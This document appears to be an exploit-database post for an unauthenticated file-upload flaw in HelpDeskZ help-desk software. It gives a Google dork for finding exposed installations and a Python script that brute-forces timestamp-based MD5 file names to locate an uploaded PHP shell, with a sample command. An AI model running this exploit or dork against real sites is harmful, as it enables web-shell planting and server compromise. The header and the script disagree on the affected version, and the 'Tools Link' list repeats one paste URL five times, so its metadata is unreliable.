# Exploit Title: HelpDeskZ 2.1.0  Unauthenticated Arbitrary File Upload
# Google Dork: intext:"Help Desk Software by HelpDeskZ"
# Exploit Author: Dyar Sahdi
# Vendor Homepage: https://www.facebook.com/Dyar.Sahdi.Linux
# Version: <= v2.1.0 
# Tested on: Win7,Linux,win10,win xp
------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------
Exploit Tool:https://github.com/evolutionscript/HelpDeskZ-1.0/tree/006662bb856e126a38f2bb76df44a2e4e3d37350
------------------------------------------------------------------------------------------------------------------------------------
Tools Link
------------------
1-https://ghostbin.com/paste/ry5j7
2-https://ghostbin.com/paste/ry5j7
3-https://ghostbin.com/paste/ry5j7
4-https://ghostbin.com/paste/ry5j7
5-https://ghostbin.com/paste/ry5j7
----------------------------------------
Steps to reproduce:
 
http://localhost/helpdeskz/?v=submit_ticket&action=displayForm
-----------------------------------------------------------------------------
Exploit.py
-------------------------
import hashlib
import time
import sys
import requests
 
print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
 
if len(sys.argv) < 3:
    print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
    sys.exit(1)
 
helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
 
currentTime = int(time.time())
 
for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()
 
    url = helpdeskzBaseUrl+md5hash+'.php'
    response = requests.head(url)
    if response.status_code == 200:
        print "found!"
        print url
        sys.exit(0)
 
print "Sorry, I did not find anything"
-----------------------------------------
Location: 
exploit.py http://localhost/helpdeskz/ phpshell.php
+++++++++++++++++++++++++++++++++++

Kurdistan Is Not Iraq